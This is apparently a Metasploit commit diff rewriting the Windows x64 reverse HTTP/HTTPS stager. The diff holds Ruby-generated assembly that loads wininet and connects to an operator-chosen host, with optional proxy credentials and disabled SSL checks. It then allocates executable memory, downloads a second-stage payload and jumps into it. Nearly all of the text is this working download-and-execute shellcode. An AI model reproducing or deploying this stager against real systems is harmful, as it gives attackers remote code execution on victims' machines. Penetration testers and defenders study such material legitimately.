Fix the wininet stager for http/s
For some reason this was only working on Windows7/2008, yet when tired on Windows 2012 it was resulting in crashes. It was also stopping working in exploits such as psexec_psh. Went back to the beginning and started again. With this in place, we can now do a bit of shellcode golf to make it a bit smaller. Adjusted payload sizes as well.unstable
@ -73,12 +73,12 @@ module Payload::Windows::ReverseHttp_x64
def generate_reverse_http(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
cld ; Clear the direction flag.
and rsp, ~0xf ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
pop rbp
pop rbp ; rbp now contains the block API pointer
Metasm::Shellcode.assemble(, combined_asm).encode_string
@ -198,190 +198,166 @@ module Payload::Windows::ReverseHttp_x64
asm = %Q^
xor rbx, rbx
push rbx
push 0 ; stack alignment
mov r14, 'wininet'
push r14 ; Push 'wininet',0 onto the stack
mov r14, rsp ; Save pointer to string
mov rcx, r14 ; the name of the lib to load
mov r10, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp
push 0 ; stack alignment
push 0 ; NULL pointer
mov rcx, rsp ; lpszAgent ("")
if proxy_enabled
asm << %Q^
call get_proxy_server
db "#{proxy_info}", 0x00
pop r8 ; stack pointer (lpszProxyName)
push 3 ; INTERNET_OPEN_TYPE_PROXY = 3 (dwAccessType)
pop rdx
push 3
pop rdx ; dwAccessType (3=INTERNET_OPEN_TYPE_PROXY)
call load_proxy_name
db "#{proxy_info}",0x0 ; proxy information
pop r8 ; lpszProxyName (stack pointer)
asm << %Q^
xor r8, r8 ; NULL pointer (lpszProxyName)
; the push/pop sequence saves a byte over XOR
push rbx
pop rdx ; PRECONFIG = 0 (dwAccessType)
xor rdx, rdx ; dwAccessType (0=INTERNET_OPEN_TYPE_PRECONFIG)
xor r8, r8 ; lpszProxyName (NULL)
asm << %Q^
push rbx ; 0 for alignment
push rbx ; 0 for alignment
xor r9, r9 ; NULL pointer (lpszProxyBypass)
mov rcx, rsp ; Empty string pointer (lpszAgent)
push rbx ; 0 (dwFlags)
push rbx ; 0 for alignment
mov r10, 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
xor r9, r9 ; lpszProxyBypass (NULL)
push rax ; stack alignment
push 0 ; dwFlags (0)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
call rbp
asm << %Q^
call internetconnect ; puts proxy host pointer on stack
db "#{opts[:host]}", 0x00
jmp dbl_get_server_host
pop rdx ; contains proxy host pointer
mov rcx, rax ; HINTERNET (hInternet)
mov r8, #{opts[:port]} ;
xor r9, r9 ; String (lpszUsername)
push rbx ; NULL (dwContext)
push rbx ; 0 (dwFlags)
push 3 ; INTERNET_SERVICE_HTTP (dwService)
push rbx ; 0 for alignment
mov r10, 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
pop rdx ; lpszServerName
mov rcx, rax ; hInternet
mov r8, #{opts[:port]} ; nServerPort
xor r9, r9 ; lpszUsername (NULL)
push r9 ; dwContent (0)
push r9 ; dwFlags (0)
push 3 ; dwService (3=INTERNET_SERVICE_HTTP)
push r9 ; lpszPassword (NULL)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
call rbp
if proxy_enabled
# only store connection handle if something is set!
if proxy_user || proxy_pass
asm << %Q^
if proxy_enabled && (proxy_user || proxy_pass)
asm << %Q^
mov rsi, rax ; Store hConnection in rsi
if proxy_user
asm << %Q^
call internetsetoption_proxy_user ; puts proxy_user pointer on stack
call load_proxy_user ; puts proxy_user pointer on stack
db "#{proxy_user}", 0x00
pop r8 ; contains proxy_user pointer
mov rcx, rsi ; (hConnection)
pop r8 ; lpBuffer (stack pointer)
mov rcx, rsi ; hConnection (connection handle)
pop rdx
push #{proxy_user.length} ; proxy_user length
push #{proxy_user.length} ; dwBufferLength (proxy_user length)
pop r9
mov r10, 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
; TODO: Without these pushes, things crashed. Not sure why.
push rbx ; 0 for alignment
push rbx ; 0 for alignment
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
call rbp
if proxy_pass
asm << %Q^
call internetsetoption_proxy_pass ; puts proxy_pass pointer on stack
call load_proxy_pass ; puts proxy_pass pointer on stack
db "#{proxy_pass}", 0x00
pop r8 ; contains proxy_pass pointer
mov rcx, rsi ; (hConnection)
pop r8 ; lpBuffer (stack pointer)
mov rcx, rsi ; hConnection (connection handle)
pop rdx
push #{proxy_pass.length} ; proxy_pass length
push #{proxy_pass.length} ; dwBufferLength (proxy_pass length)
pop r9
mov r10, 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
; TODO: Without these pushes, things crashed. Not sure why.
push rbx ; 0 for alignment
push rbx ; 0 for alignment
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
call rbp
if proxy_user || proxy_pass
asm << %Q^
asm << %Q^
mov rax, rsi ; Restore hConnection in rax
asm << %Q^
call httpopenrequest
db "#{opts[:url]}",0x00
jmp get_server_uri
pop r8 ; String (lpszObjectName)
mov rcx, rax ; HINTERNET (hConnect)
; the push/pop sequence saves a byte over XOR
push rbx
pop rdx ; NULL pointer (lpszVerb)
xor r9, r9 ; String (lpszVersion)
push rbx ; 0 (dwContext)
; TODO: figure out what's going on here (get help from HD?)
; Having to use mov + push instead of push qword because
; Metasm doesn't seem to like it. Plain 'push' doesn't work
; because of an overflow error.
;push qword 0x#{http_open_flags.to_s(16)} ; (dwFlags)
mov r10, 0x#{http_open_flags.to_s(16)} ; (dwFlags)
mov rcx, rax ; hConnect
xor rdx, rdx ; lpszVerb (NULL=GET)
pop r8 ; lpszObjectName (URI)
xor r9, r9 ; lpszVersion (NULL)
push rdx ; dwContext (0)
mov r10, #{"0x%.8x" % http_open_flags} ; dwFlags
push r10
push rbx ; NULL pointer (lplpszAcceptTypes)
push rbx ; NULL pointer (lpszReferer)
mov r10, 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
push rdx ; lplpszAcceptType (NULL)
push rdx ; lpszReferer (NULL)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
call rbp
mov rsi, rax ; Store the request handle in RSI
mov rsi, rax
push #{retry_count}
pop rdi
if opts[:ssl]
asm << %Q^
mov rcx, rsi ; (hInternet)
pop rdx
push rbx ; 0 for alignment
push #{set_option_flags} ; (dwFlags)
mov r8, rsp
push 4 ; sizeof(dwFlags)
pop r9
mov r10, 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
mov rcx, rsi ; hInternet (request handle)
mov rdx, 31 ; dwOption (31=INTERNET_OPTION_SECURITY_FLAG)
push 0 ; stack alignment
push #{"0x%.8x" % set_option_flags} ; flags
mov r8, rsp ; lpBuffer (pointer to flags)
mov r9, 4 ; dwBufferLength (4 = size of flags)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
call rbp
asm << %Q^
mov rcx, rsi ; HINTERNET (hRequest)
; the push/pop sequence saves a byte over XOR
push rbx
pop rdx ; NULL pointer (lpszHeaders)
xor r8, r8 ; 0 (dwHeadersLength)
xor r9, r9 ; NULL pointer (lpOptional)
push rbx ; 0 for alignment
push rbx ; 0 (dwOptionalLength)
mov r10, 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
mov rcx, rsi ; hRequest (request handle)
xor rdx, rdx ; lpszHeaders (NULL)
xor r8, r8 ; dwHeadersLen (0)
xor r9, r9 ; lpszVersion (NULL)
push rdx ; stack alignment
push rdx ; dwOptionalLength (0)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
call rbp
test eax, eax ; use eax, it's 1 byte less than rax
test eax, eax
jnz allocate_memory
dec edi ; use edi, it's 1 byte less than rdi
dec rdi
jz failure
jmp retry
jmp retryrequest
jmp get_server_host
call httpopenrequest
db "#{opts[:url]}",0x0
if opts[:exitfunk]
@ -392,52 +368,56 @@ module Payload::Windows::ReverseHttp_x64
asm << %Q^
push 0x56A2B5F0 ; hardcoded to exitprocess for size
push 0 ; stack alignment
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call rbp
asm << %Q^
; the push/pop sequence saves a byte over XOR
push rbx
pop rcx ; NULL pointer (lpAddress)
mov rdx, 0x00400000 ; SIZE_T (dwSize)
mov r8, 0x1000 ; MEM_COMMIT (flAllocationType)
push 0x40
pop r9 ; PAGE_EXECUTE_READWRITE (flProtect)
mov r10, 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
xor rcx, rcx ; lpAddress (NULL)
mov rdx, 0x00400000 ; dwSize (4 MB)
mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT)
mov r9, 0x40 ; flProtect (0x40=PAGE_EXECUTE_READWRITE)
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp
xchg rax, rbx ; place the allocated base address in ebx
push rbx ; store a copy of the stage base address on the stack
push rbx ; temporary storage for bytes read count
mov rdi, rsp ; &bytesRead
xchg rax, rbx ; store the allocated base in rbx
push rbx ; store a copy for later
push rbx ; temp storage for byte count
mov rdi, rsp ; rdi is the &bytesRead
mov rcx, rsi ; HINTERNET (hFile)
mov rdx, rbx ; (lpBuffer)
mov r8, 8192 ; (dwNumberOfBytesToRead)
mov r9, rdi ; (lpNumberOfBytesRead)
mov r10, 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
mov rcx, rsi ; hFile (request handle)
mov rdx, rbx ; lpBuffer (pointer to mem)
mov r8, 8192 ; dwNumberOfBytesToRead (8k)
mov r9, rdi ; lpdwNumberOfByteRead (stack pointer)
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
call rbp
add rsp, 32 ; clean up reserved space
add rsp, 32 ; clean up reserved space
test eax, eax ; did the download fail?
test eax, eax ; did the download fail?
jz failure
mov ax, word ptr [rdi]
; Use ebx/eax here because we save bytes (don't need higher order 32 bits)
add ebx, eax ; buffer += lpNumberOfBytesRead
mov ax, word ptr [rdi] ; extract the read byte count
add rbx, rax ; buffer += bytes read
test eax, eax ; use eax instead of rax, saves a byte
jnz download_more ; loop until 0 is returned
pop rax ; clear temp storage
pop rax ; alignment
test rax, rax ; are we done?
jnz download_more ; keep going
pop rax ; clear up reserved space
pop rax ; realign again
ret ; dive into the stored stage address
ret ; return to the stored stage address
call internetconnect
db "#{opts[:host]}",0x0
if opts[:exitfunk]
@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_http'
module Metasploit4
CachedSize = 491
CachedSize = 520
include Msf::Payload::Stager
include Msf::Payload::Windows
@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_https'
module Metasploit4
CachedSize = 522
CachedSize = 562
include Msf::Payload::Stager
include Msf::Payload::Windows
Reference in New Issue